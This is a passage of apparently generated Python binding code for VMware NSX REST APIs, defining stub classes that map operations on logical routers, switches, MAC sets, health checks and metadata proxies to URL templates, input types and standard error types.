        delete_input_type = type.StructType('operation-input', {
            'logical_router_port_id': type.StringType(),
            'cascade_delete_linked_ports': type.OptionalType(type.BooleanType()),
            'force': type.OptionalType(type.BooleanType()),
        })
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/logical-router-ports/{logical-router-port-id}',
            path_variables={'logical_router_port_id': 'logical-router-port-id'},
            query_parameters={
                'cascade_delete_linked_ports': 'cascade_delete_linked_ports',
                'force': 'force',
            },
            content_type='application/json')

        # get: GET /api/v1/logical-router-ports/{logical-router-port-id}
        get_input_type = type.StructType('operation-input', {
            'logical_router_port_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/logical-router-ports/{logical-router-port-id}',
            path_variables={'logical_router_port_id': 'logical-router-port-id'},
            query_parameters={},
            content_type='application/json')

        # list: GET /api/v1/logical-router-ports (paged, filterable)
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'logical_router_id': type.OptionalType(type.StringType()),
            'logical_switch_id': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'resource_type': type.OptionalType(type.StringType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        # Query-parameter names are identical on the wire and in the input
        # struct, so the mapping is the identity over the field names.
        list_query_names = (
            'cursor', 'included_fields', 'logical_router_id',
            'logical_switch_id', 'page_size', 'resource_type',
            'sort_ascending', 'sort_by')
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/logical-router-ports',
            path_variables={},
            query_parameters={name: name for name in list_query_names},
            content_type='application/json')

        # update: PUT /api/v1/logical-router-ports/{logical-router-port-id}
        update_input_type = type.StructType('operation-input', {
            'logical_router_port_id': type.StringType(),
            'logical_router_port': _port_struct(),
        })
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/logical-router-ports/{logical-router-port-id}',
            request_body_parameter='logical_router_port',
            path_variables={'logical_router_port_id': 'logical-router-port-id'},
            query_parameters={},
            content_type='application/json')

        operations = {
            'create': _op(create_input_type, _port_struct(),
                          [HasFieldsOfValidator()], [HasFieldsOfValidator()]),
            'delete': _op(delete_input_type, type.VoidType(), [], []),
            'get': _op(get_input_type, _port_struct(),
                       [], [HasFieldsOfValidator()]),
            'list': _op(list_input_type,
                        type.ReferenceType(model_ns, 'LogicalRouterPortListResult'),
                        [], [HasFieldsOfValidator()]),
            'update': _op(update_input_type, _port_struct(),
                          [HasFieldsOfValidator()], [HasFieldsOfValidator()]),
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.logical_router_ports',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _LogicalRoutersStub(ApiInterfaceStub):
    """REST stub for com.vmware.nsx.logical_routers: CRUD + list plus the
    reallocate/reprocess actions over /api/v1/logical-routers."""

    def __init__(self, config):
        errors_ns = 'com.vmware.vapi.std.errors_client'
        model_ns = 'com.vmware.nsx.model_client'

        def _std_errors():
            # Every operation on this interface reports the same five
            # standard vAPI errors; return a fresh mapping per operation.
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType(errors_ns, 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType(errors_ns, 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType(errors_ns, 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType(errors_ns, 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType(errors_ns, 'NotFound'),
            }

        def _router_ref():
            # Reference to the LogicalRouter model type used for request
            # bodies and for create/get/reallocate/update responses.
            return type.ReferenceType(model_ns, 'LogicalRouter')

        def _op(input_type, output_type, input_validators, output_validators):
            # One operation descriptor in the shape ApiInterfaceStub expects.
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': _std_errors(),
                'input_value_validator_list': input_validators,
                'output_validator_list': output_validators,
                'task_type': TaskType.NONE,
            }

        # create: POST /api/v1/logical-routers
        create_input_type = type.StructType('operation-input', {
            'logical_router': _router_ref(),
        })
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/logical-routers',
            request_body_parameter='logical_router',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # delete: DELETE /api/v1/logical-routers/{logical-router-id}
        delete_input_type = type.StructType('operation-input', {
            'logical_router_id': type.StringType(),
            'cascade_delete_linked_ports': type.OptionalType(type.BooleanType()),
            'force': type.OptionalType(type.BooleanType()),
        })
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/logical-routers/{logical-router-id}',
            path_variables={'logical_router_id': 'logical-router-id'},
            query_parameters={
                'cascade_delete_linked_ports': 'cascade_delete_linked_ports',
                'force': 'force',
            },
            content_type='application/json')

        # get: GET /api/v1/logical-routers/{logical-router-id}
        get_input_type = type.StructType('operation-input', {
            'logical_router_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/logical-routers/{logical-router-id}',
            path_variables={'logical_router_id': 'logical-router-id'},
            query_parameters={},
            content_type='application/json')

        # list: GET /api/v1/logical-routers (paged, filterable)
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'router_type': type.OptionalType(type.StringType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        # Wire names match the input-struct field names exactly.
        list_query_names = ('cursor', 'included_fields', 'page_size',
                            'router_type', 'sort_ascending', 'sort_by')
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/logical-routers',
            path_variables={},
            query_parameters={name: name for name in list_query_names},
            content_type='application/json')

        # reallocate: POST /api/v1/logical-routers/{id}?action=reallocate
        reallocate_input_type = type.StructType('operation-input', {
            'logical_router_id': type.StringType(),
            'service_router_allocation_config': type.ReferenceType(
                model_ns, 'ServiceRouterAllocationConfig'),
        })
        reallocate_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/logical-routers/{logical-router-id}?action=reallocate',
            request_body_parameter='service_router_allocation_config',
            path_variables={'logical_router_id': 'logical-router-id'},
            query_parameters={},
            content_type='application/json')

        # reprocess: POST /api/v1/logical-routers/{id}?action=reprocess
        reprocess_input_type = type.StructType('operation-input', {
            'logical_router_id': type.StringType(),
        })
        reprocess_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/logical-routers/{logical-router-id}?action=reprocess',
            path_variables={'logical_router_id': 'logical-router-id'},
            query_parameters={},
            content_type='application/json')

        # update: PUT /api/v1/logical-routers/{logical-router-id}
        update_input_type = type.StructType('operation-input', {
            'logical_router_id': type.StringType(),
            'logical_router': _router_ref(),
        })
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/logical-routers/{logical-router-id}',
            request_body_parameter='logical_router',
            path_variables={'logical_router_id': 'logical-router-id'},
            query_parameters={},
            content_type='application/json')

        operations = {
            'create': _op(create_input_type, _router_ref(),
                          [HasFieldsOfValidator()], [HasFieldsOfValidator()]),
            'delete': _op(delete_input_type, type.VoidType(), [], []),
            'get': _op(get_input_type, _router_ref(),
                       [], [HasFieldsOfValidator()]),
            'list': _op(list_input_type,
                        type.ReferenceType(model_ns, 'LogicalRouterListResult'),
                        [], [HasFieldsOfValidator()]),
            'reallocate': _op(reallocate_input_type, _router_ref(),
                              [HasFieldsOfValidator()], [HasFieldsOfValidator()]),
            'reprocess': _op(reprocess_input_type, type.VoidType(), [], []),
            'update': _op(update_input_type, _router_ref(),
                          [HasFieldsOfValidator()], [HasFieldsOfValidator()]),
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'reallocate': reallocate_rest_metadata,
            'reprocess': reprocess_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.logical_routers',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _LogicalSwitchesStub(ApiInterfaceStub):
    """REST stub for com.vmware.nsx.logical_switches: CRUD + list over
    /api/v1/logical-switches. No input/output validators are registered."""

    def __init__(self, config):
        errors_ns = 'com.vmware.vapi.std.errors_client'
        model_ns = 'com.vmware.nsx.model_client'

        def _std_errors():
            # Every operation on this interface reports the same five
            # standard vAPI errors; return a fresh mapping per operation.
            return {
                'com.vmware.vapi.std.errors.service_unavailable':
                    type.ReferenceType(errors_ns, 'ServiceUnavailable'),
                'com.vmware.vapi.std.errors.invalid_request':
                    type.ReferenceType(errors_ns, 'InvalidRequest'),
                'com.vmware.vapi.std.errors.internal_server_error':
                    type.ReferenceType(errors_ns, 'InternalServerError'),
                'com.vmware.vapi.std.errors.unauthorized':
                    type.ReferenceType(errors_ns, 'Unauthorized'),
                'com.vmware.vapi.std.errors.not_found':
                    type.ReferenceType(errors_ns, 'NotFound'),
            }

        def _switch_ref():
            # Reference to the LogicalSwitch model type used for request
            # bodies and for create/get/update responses.
            return type.ReferenceType(model_ns, 'LogicalSwitch')

        def _op(input_type, output_type):
            # Operation descriptor; this interface registers no validators.
            return {
                'input_type': input_type,
                'output_type': output_type,
                'errors': _std_errors(),
                'input_value_validator_list': [],
                'output_validator_list': [],
                'task_type': TaskType.NONE,
            }

        # create: POST /api/v1/logical-switches
        create_input_type = type.StructType('operation-input', {
            'logical_switch': _switch_ref(),
        })
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/logical-switches',
            request_body_parameter='logical_switch',
            path_variables={},
            query_parameters={},
            content_type='application/json')

        # delete: DELETE /api/v1/logical-switches/{lswitch-id}
        delete_input_type = type.StructType('operation-input', {
            'lswitch_id': type.StringType(),
            'cascade': type.OptionalType(type.BooleanType()),
            'detach': type.OptionalType(type.BooleanType()),
        })
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/logical-switches/{lswitch-id}',
            path_variables={'lswitch_id': 'lswitch-id'},
            query_parameters={
                'cascade': 'cascade',
                'detach': 'detach',
            },
            content_type='application/json')

        # get: GET /api/v1/logical-switches/{lswitch-id}
        get_input_type = type.StructType('operation-input', {
            'lswitch_id': type.StringType(),
        })
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/logical-switches/{lswitch-id}',
            path_variables={'lswitch_id': 'lswitch-id'},
            query_parameters={},
            content_type='application/json')

        # list: GET /api/v1/logical-switches (paged, filterable)
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'diagnostic': type.OptionalType(type.BooleanType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
            'switching_profile_id': type.OptionalType(type.StringType()),
            'transport_type': type.OptionalType(type.StringType()),
            'transport_zone_id': type.OptionalType(type.StringType()),
            'uplink_teaming_policy_name': type.OptionalType(type.StringType()),
            'vlan': type.OptionalType(type.IntegerType()),
            'vni': type.OptionalType(type.IntegerType()),
        })
        # Wire names match the input-struct field names exactly.
        list_query_names = (
            'cursor', 'diagnostic', 'included_fields', 'page_size',
            'sort_ascending', 'sort_by', 'switching_profile_id',
            'transport_type', 'transport_zone_id',
            'uplink_teaming_policy_name', 'vlan', 'vni')
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/logical-switches',
            path_variables={},
            query_parameters={name: name for name in list_query_names},
            content_type='application/json')

        # update: PUT /api/v1/logical-switches/{lswitch-id}
        update_input_type = type.StructType('operation-input', {
            'lswitch_id': type.StringType(),
            'logical_switch': _switch_ref(),
        })
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/logical-switches/{lswitch-id}',
            request_body_parameter='logical_switch',
            path_variables={'lswitch_id': 'lswitch-id'},
            query_parameters={},
            content_type='application/json')

        operations = {
            'create': _op(create_input_type, _switch_ref()),
            'delete': _op(delete_input_type, type.VoidType()),
            'get': _op(get_input_type, _switch_ref()),
            'list': _op(list_input_type,
                        type.ReferenceType(model_ns, 'LogicalSwitchListResult')),
            'update': _op(update_input_type, _switch_ref()),
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.logical_switches',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _MacSetsStub(ApiInterfaceStub):
    """
    REST stub for the ``com.vmware.nsx.mac_sets`` service
    (``/api/v1/mac-sets``): create/delete/get/list/update of MACSet
    resources.

    NOTE(review): this looks like machine-generated vAPI binding code --
    prefer regenerating from the API spec over hand-editing; every string
    literal here (wire names, URL templates, error keys) is part of the
    wire contract.
    """
    def __init__(self, config):
        """Assemble per-operation input types, error maps, validators and
        REST metadata, then register them with :class:`ApiInterfaceStub`.

        :param config: vAPI stub configuration forwarded to the base class.
        """
        # properties for create operation
        create_input_type = type.StructType('operation-input', {
            # 'm_AC_set' is the generated wire name for the MACSet body
            # parameter; it must match request_body_parameter below.
            'm_AC_set': type.ReferenceType('com.vmware.nsx.model_client', 'MACSet'),
        })
        create_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        create_input_value_validator_list = [
        ]
        create_output_validator_list = [
        ]
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/mac-sets',
            request_body_parameter='m_AC_set',
            path_variables={
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for delete operation
        delete_input_type = type.StructType('operation-input', {
            'mac_set_id': type.StringType(),
            'force': type.OptionalType(type.BooleanType()),
        })
        delete_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            # delete is the only operation of this service that declares
            # ConcurrentChange.
            'com.vmware.vapi.std.errors.concurrent_change':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ConcurrentChange'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        delete_input_value_validator_list = [
        ]
        delete_output_validator_list = [
        ]
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/mac-sets/{mac-set-id}',
            # maps the python parameter name to the {placeholder} in the URL
            path_variables={
                'mac_set_id': 'mac-set-id',
            },
            query_parameters={
                'force': 'force',
            },
            content_type='application/json'
        )
        # properties for get operation
        get_input_type = type.StructType('operation-input', {
            'mac_set_id': type.StringType(),
        })
        get_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        get_input_value_validator_list = [
        ]
        get_output_validator_list = [
        ]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/mac-sets/{mac-set-id}',
            path_variables={
                'mac_set_id': 'mac-set-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for list operation
        # Standard NSX pagination/sorting parameters, all optional.
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        list_input_value_validator_list = [
        ]
        list_output_validator_list = [
        ]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/mac-sets',
            path_variables={
            },
            query_parameters={
                'cursor': 'cursor',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json'
        )
        # properties for update operation
        update_input_type = type.StructType('operation-input', {
            'mac_set_id': type.StringType(),
            'm_AC_set': type.ReferenceType('com.vmware.nsx.model_client', 'MACSet'),
        })
        update_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        update_input_value_validator_list = [
        ]
        update_output_validator_list = [
        ]
        update_rest_metadata = OperationRestMetadata(
            http_method='PUT',
            url_template='/api/v1/mac-sets/{mac-set-id}',
            request_body_parameter='m_AC_set',
            path_variables={
                'mac_set_id': 'mac-set-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # Operation registry: input/output types, error maps, validators and
        # task handling per operation name.
        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'MACSet'),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': create_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': delete_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'MACSet'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'MACSetListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'update': {
                'input_type': update_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'MACSet'),
                'errors': update_error_dict,
                'input_value_validator_list': update_input_value_validator_list,
                'output_validator_list': update_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
            'update': update_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.mac_sets',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _ManualHealthChecksStub(ApiInterfaceStub):
    """
    REST stub for the ``com.vmware.nsx.manual_health_checks`` service
    (``/api/v1/manual-health-checks``).

    Exposes create/delete/get/list only -- unlike the sibling stubs there
    is deliberately no ``update`` operation here.  NOTE(review): this
    looks like machine-generated vAPI binding code; prefer regenerating
    from the API spec over hand-editing.
    """
    def __init__(self, config):
        """Assemble per-operation input types, error maps, validators and
        REST metadata, then register them with :class:`ApiInterfaceStub`.

        :param config: vAPI stub configuration forwarded to the base class.
        """
        # properties for create operation
        create_input_type = type.StructType('operation-input', {
            # Wire name of the body parameter; must match
            # request_body_parameter below.
            'manual_health_check': type.ReferenceType('com.vmware.nsx.model_client', 'ManualHealthCheck'),
        })
        create_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        create_input_value_validator_list = [
        ]
        create_output_validator_list = [
        ]
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/manual-health-checks',
            request_body_parameter='manual_health_check',
            path_variables={
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for delete operation
        delete_input_type = type.StructType('operation-input', {
            'manual_health_check_id': type.StringType(),
        })
        delete_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        delete_input_value_validator_list = [
        ]
        delete_output_validator_list = [
        ]
        delete_rest_metadata = OperationRestMetadata(
            http_method='DELETE',
            url_template='/api/v1/manual-health-checks/{manual-health-check-id}',
            # maps the python parameter name to the {placeholder} in the URL
            path_variables={
                'manual_health_check_id': 'manual-health-check-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for get operation
        get_input_type = type.StructType('operation-input', {
            'manual_health_check_id': type.StringType(),
        })
        get_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        get_input_value_validator_list = [
        ]
        get_output_validator_list = [
        ]
        get_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/manual-health-checks/{manual-health-check-id}',
            path_variables={
                'manual_health_check_id': 'manual-health-check-id',
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for list operation
        # Standard NSX pagination/sorting parameters, all optional.
        list_input_type = type.StructType('operation-input', {
            'cursor': type.OptionalType(type.StringType()),
            'included_fields': type.OptionalType(type.StringType()),
            'page_size': type.OptionalType(type.IntegerType()),
            'sort_ascending': type.OptionalType(type.BooleanType()),
            'sort_by': type.OptionalType(type.StringType()),
        })
        list_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        list_input_value_validator_list = [
        ]
        list_output_validator_list = [
        ]
        list_rest_metadata = OperationRestMetadata(
            http_method='GET',
            url_template='/api/v1/manual-health-checks',
            path_variables={
            },
            query_parameters={
                'cursor': 'cursor',
                'included_fields': 'included_fields',
                'page_size': 'page_size',
                'sort_ascending': 'sort_ascending',
                'sort_by': 'sort_by',
            },
            content_type='application/json'
        )
        # Operation registry -- note: no 'update' entry for this service.
        operations = {
            'create': {
                'input_type': create_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ManualHealthCheck'),
                'errors': create_error_dict,
                'input_value_validator_list': create_input_value_validator_list,
                'output_validator_list': create_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'delete': {
                'input_type': delete_input_type,
                'output_type': type.VoidType(),
                'errors': delete_error_dict,
                'input_value_validator_list': delete_input_value_validator_list,
                'output_validator_list': delete_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'get': {
                'input_type': get_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ManualHealthCheck'),
                'errors': get_error_dict,
                'input_value_validator_list': get_input_value_validator_list,
                'output_validator_list': get_output_validator_list,
                'task_type': TaskType.NONE,
            },
            'list': {
                'input_type': list_input_type,
                'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ManualHealthCheckListResult'),
                'errors': list_error_dict,
                'input_value_validator_list': list_input_value_validator_list,
                'output_validator_list': list_output_validator_list,
                'task_type': TaskType.NONE,
            },
        }
        rest_metadata = {
            'create': create_rest_metadata,
            'delete': delete_rest_metadata,
            'get': get_rest_metadata,
            'list': list_rest_metadata,
        }
        ApiInterfaceStub.__init__(
            self, iface_name='com.vmware.nsx.manual_health_checks',
            config=config, operations=operations, rest_metadata=rest_metadata,
            is_vapi_rest=False)
class _MdProxiesStub(ApiInterfaceStub):
    """
    REST stub for the ``com.vmware.nsx.md_proxies`` service
    (``/api/v1/md-proxies``): create/delete/get/list/update of
    MetadataProxy resources.

    NOTE(review): this looks like machine-generated vAPI binding code --
    prefer regenerating from the API spec over hand-editing.
    """
    def __init__(self, config):
        """Assemble per-operation input types, error maps, validators and
        REST metadata, then register them with :class:`ApiInterfaceStub`.

        :param config: vAPI stub configuration forwarded to the base class.
        """
        # properties for create operation
        create_input_type = type.StructType('operation-input', {
            # Wire name of the body parameter; must match
            # request_body_parameter below.
            'metadata_proxy': type.ReferenceType('com.vmware.nsx.model_client', 'MetadataProxy'),
        })
        create_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
            'com.vmware.vapi.std.errors.invalid_request':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
            'com.vmware.vapi.std.errors.internal_server_error':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
            'com.vmware.vapi.std.errors.unauthorized':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
            'com.vmware.vapi.std.errors.not_found':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
        }
        create_input_value_validator_list = [
        ]
        create_output_validator_list = [
        ]
        create_rest_metadata = OperationRestMetadata(
            http_method='POST',
            url_template='/api/v1/md-proxies',
            request_body_parameter='metadata_proxy',
            path_variables={
            },
            query_parameters={
            },
            content_type='application/json'
        )
        # properties for delete operation
        delete_input_type = type.StructType('operation-input', {
            'proxy_id': type.StringType(),
        })
        delete_error_dict = {
            'com.vmware.vapi.std.errors.service_unavailable':
                type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
